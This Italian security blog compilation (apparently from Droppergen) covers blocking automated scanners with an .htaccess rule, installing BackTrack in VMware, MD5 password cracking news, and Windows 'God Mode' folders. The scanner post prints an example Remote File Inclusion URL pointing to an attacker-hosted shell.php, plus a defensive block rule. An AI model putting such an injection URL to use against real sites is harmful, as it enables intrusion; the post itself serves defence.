Come proteggere il tuo sito da scanner hack

Scanner hacker: Come proteggersi

Come detto nel mio articolo, la pirateria non si limita al solo nome “Hacker”,

ma ben sì ci sono moltissimi “ranghi” molto pericolosi,

tra questi sono i Lamer e Script Kieddie.

Molti di essi affidano la loro “penetration-test” a scanner automatici,

essi hanno la funzione di fare una scansione casuale su moltissimi siti,

con l’obbiettivo di trovare e testare vulnerabilità di siti casuali e segnalarli all’attaccante.

Grazie al mio tutorial ti spiegherò come è possibile prevenire alcuni attacchi provenienti da scanner.

Funzione degli Scanner e un po di teoria

Molti scanner utilizzano l’user-agent “libwww-perl.” ,

probabilmente se hai un sito online da diversi mesi, se controllerai i tuoi log troverai numerosi tentativi provenienti da esso.

Questo user-agent accede alle tue pagine (via url) tentando di iniettare un codice oppure caricare un file.

Come potrai dedurre è molto pericoloso, poiché questi scanner molto spesso hanno la funzione di testare un SQLi (SQL injection), RFI (Remote File Inclusion), LFI (Local File Inclusion) ecc ecc.

Questi tipi di strumenti spesso utilizzano il comando “=http:” “=www:”

Per esempio, www.tuosito.it/cartella/pagina.php?id21=http://www.attaccante.com/shell.php

Come proteggere il mio sito?

Per risolvere questo problema basterà semplicemente aggiungere questo codice nel tuo .htaccess

e farà in modo di bloccare le provenienze dell’user-agents libwww-perl:

RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]   RewriteCond %{QUERY_STRING} ^(.*)=http [NC]   RewriteRule ^(.*)$ – [F,L]

Grazie a questo piccolo trick il tuo sito inizierà ad essere più sicuro.

Come proteggere il tuo sito da scanner hack

Come installare Backtrack con VMware Player

Backtrack: Come installarlo e come configurarlo

Backtrack è un sistema operativo completamente Open Source,

quindi completamente gratuito e accessibile a tutti.

Esso mette a disposizione numerosi strumenti per “penetration-test” (test sulla sicurezza online e locale).

Spesso usato dagli esperti informatici per testare la sicurezza sia per aziende sia per privati.

Per scaricare Backtrack ti basterà andare sul sito ufficiale ( http://www.backtrack-linux.org/downloads/ ),

compilare un veloce form di registrazione (facoltativo) e passare al download.

Potrai scegliere quale versione scaricare, se per 23bit o 64 e anche con quale estensione!

ecco un piccolo esempio:

Backtrack è possibile installarlo come un normalissimo sistema operativo oppure hai la possibilità di installarlo su un cd,

una chiavetta usb o utilizzando VMware (che si intende per “macchina virtuale”).

In questo tutorial ti illustrerò come installare ed avviare Backtrack utilizzando VMware,

in questo modo potrai utilizzare il tuo sistema operativo preferito e nel frattempo usare Backtrack, ambedue nella solita macchina!

Installare Backtrack su VMware

Come prima cosa dovrai scaricare Backtrack (versione iso) e installare (installazione tipica) VMware Player  e avviarlo.

Ti si presenterà questa schermata:

Premi “Create a New Virtual Machine”.

Nella seconda voce premi “Browse…”, cerca e clicca il file backtrack.iso (scaricato in precedenza)

Adesso VMware ti chiederà che tipo di sistema operativo stai per installare:

nella prima voce seleziona “Linux” e su Version metti “Ubuntu”.

Scegli il nome e la directory del tuo nuovo sistema operativo.

Su “Maximum disk size” basta semplicemente mettere 5GB e impostare su “Store virtual disk as a single file”

Adesso clicca su “Customize Hardware” e imposta i seguenti parametri:

- Seleziona la voce “Printer” e premi il bottone (in basso) “Remove”

- Seleziona la voce “Processors” e imposta a “2″

- Seleziona la voce “Memory” e imposta a 1GB

- Seleziona la voce “Newtwork Adapter” e imposta sulla voce “newtowrk connection” su “Bridged: Connected directly to the physical network”

Infine premi il bottone “Add” (a fianco sinistro di “remove”)

e aggiungi le voci “Parallel Port” e “Serial Port” (lasciando il settaggio predefinito)

Avrai questo risultato:

Dunque premere su “Finish”

Installazione sistema operativo Backtrack

Finalmente l’installazione di VMware è stata completata. Adesso dobbiamo pensare

ad installare Backtrack e quindi eseguirlo!

Dopo che avrai premuto sul tasto “finish”, backtrack iniziterà il suo caricamento

e la prima interfaccia che ti si presenterà sarà questa:

Dunque lascia su “BackTrack Text – Default Boot text Mode” e premi invio.

Attendi qualche minuto fino al completamente dell’installazione.

Una volta completato il processo, backtrack ti chiederà di digitare un comando:

dovrai scrivere “startx” (senza virgolette), esso significa “avvia”.

Finalmente BackTrack è stato installato con successo sul tuo computer!

Adesso ti basterà semplicemente cliccare sull’icona “Install Backtrack” posta sul desktop

e proseguire con l’installazione tipica (per esempio: lingua, impostare italiano. Lingua tastiera, italiano ecc)

Beh, penso che non avrai problemi su questo paragrafo, ma se dovessi averli puoi benissimo commentare questo articolo e sarò felice di aiutarti.

Nota:

Una volta chiuso Backtrack ,per avviarlo di nuovo ,ti basterà cliccare sul programma “VMware” (su windows) selezionare il sistema operativo (backtrack) e premere “Play Virtual Machine”.

Una volta avviato questa volta BT ti chiederà un username e password, usa queste:
username: root

password: toor

Come installare Backtrack con VMware Player

Password complesse crackate con facilità

Alcuni Hacker sono riusciti a crackare password complesse, sino a 16 caratteri.

Scoperto un metodo per crackare password complesse in meno di un’ora

La password serve a proteggere i propri dati personali, le transazioni finanziarie, i propri account sui social network e un’altra miriade di cose . Insomma ..essa viene utilizzata per impedire l’accesso alle persone “non gradite” .

Spesso si dice che , come password, non bisogna utilizzare parole da manuale  o parole riconducibili al proprietario per evitare che qualcuno riesca a scoprirla facilmente. Ma cosa succede se gli hacker hanno scoperto un metodo per crackare password complesse di 16 caratteri?

Un gruppo di Hacker è riuscito a crackare 14 800 password apparentemente casuali da una lista di 16.449 convertiti in hash usando la funzione MD5 cryptographic hash.

Il problema è il metodo relativamente debole di encrypting: esso è chiamato hash. Essa è una stringa matematica che si crea una volta inserita la password.

Sappiamo che un computer merce che utilizza una semplice scheda video AMD Radeon 7970 ci ha messo 20 ore per crackare 14 800 hash con un tasso di successo del 90 % utilizzando un metodo Brute Force .

Il metodo Brute Force è un metodo attraverso il quale un computer tenta ogni possibile combinazione di caratteri grazie al quale gli Hacker riescono a decifrare un’infinita quantità di password.

Possiamo dire che nessuna password è al sicuro: l’unica difesa che ci è rimasta è quella di utilizzare parole molto lunghe contenenti caratteri speciali quali &, \, @ . Inoltre sarebbe meglio non utilizzare sempre la stessa password e cambiarla ogni poco tempo. Per avere ulteriori informazioni su come avere una password sicura potete leggere il nostro Articolo dove vi spieghiamo e vi consigliamo alcuni metodi su come rendere la vostra password più sicura.

 

Password complesse crackate con facilità

Modalità God Mode sia su Windows 7 che su Windows 8

In questo breve tutorial ti spiegherò come attivare la modalità “God Mode” sia su Windows 7 che su Windows 8.

God Mod (Modalità Dio) è una semplice cartella che raccoglie un lungo elenco di impostazioni di personalizzazione di Windows,

In questo modo potrai modificare tantissime cose senza faticare troppo!.

Attivarla è un gioco da ragazzi e non richiede l’installazione di alcun software!.

Per prima cosa clicca con il destro sul Desktop,

Crea una nuova cartella e rinominala con “GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}” (senza virgolette).

Se tutto ti è andato a buon fine avrai questo risultato:

Perfetto! adesso sei pronto ad esplorare la nuova cartella in versione DIO

Nota:

La cartella God Mode è molto utile se vuoi modificare velocemente alcune impostazioni evitando di cercarle in giro per il tuo Computer

Altri codici God Mode

Potrai sfruttare la stessa procedura iniziale creando altre cartelle e fare in modo di avere accesso rapido ad altre impostazioni.

Ecco alcuni accessi rapidi che potrebbero esserti utili:

Posizione predefinita: GodMode.{00C6D95F-329C-409a-81D7-C46C66EA7F33}

Dispositivi biometrici: GodMode.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}

Impostazioni risparmio energia: GodMode.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}

Impostazioni icone e notifiche nella barra delle applicazioni: GodMode.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}

Credenziali per l’accesso automatico: GodMode.{1206F5F1-0569-412C-8FEC-3204630DFB70}

Installa un programma dalla rete: GodMode.{15eae92e-f17a-4431-9f28-805e482dafd4}

Impostazioni programmi predefiniti: GodMode.{17cd9488-1228-4b2f-88ce-4298e93e0966}

Assembly: GodMode.{1D2680C9-0E2A-469d-B787-065558BC7D43}

Gestione reti wireless: GodMode.{1FA9085F-25A2-489B-85D4-86326EEDCD87}

Rete: GodMode. {208D2C60-3AEA-1069-A2D7-08002B30309D}

Esplora risorse, cartella Computer: GodMode. {20D04FE0-3AEA-1069-A2D8-08002B30309D}

Stampanti: GodMode.{2227A280-3AEA-1069-A2DE-08002B30309D}

Connessione a desktop e stampanti in rete: GodMode.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}

Windows Firewall: GodMode.{4026492F-2F69-46B8-B9BF-5654FC07E423}

Prestazioni del computer: GodMode. {78F3955E-3B90-4184-BD14-5397C15F1EFC}

Buon divertimento!

Modalità God Mode sia su Windows 7 che su Windows 8

Droppergen

Sicurezza e Novità Informatiche http://droppergen.net
Il blog che stavi cercando =)

Test Post from Droppergen - Sicurezza e Novità

Test Post from Droppergen - Sicurezza e Novità Informatiche http://droppergen.net

Droppergen.net

Droppergen è un blog che tratta della sicurezza informatica in generale. Grazie a questo blog riuscirai a prevenire (e curare) numerose minacce da parte dei malintenzionati presenti in rete. Tutti gli articoli e le guide presenti, sono messe a vostra disposizione gratuitamente.

www.droppergen.net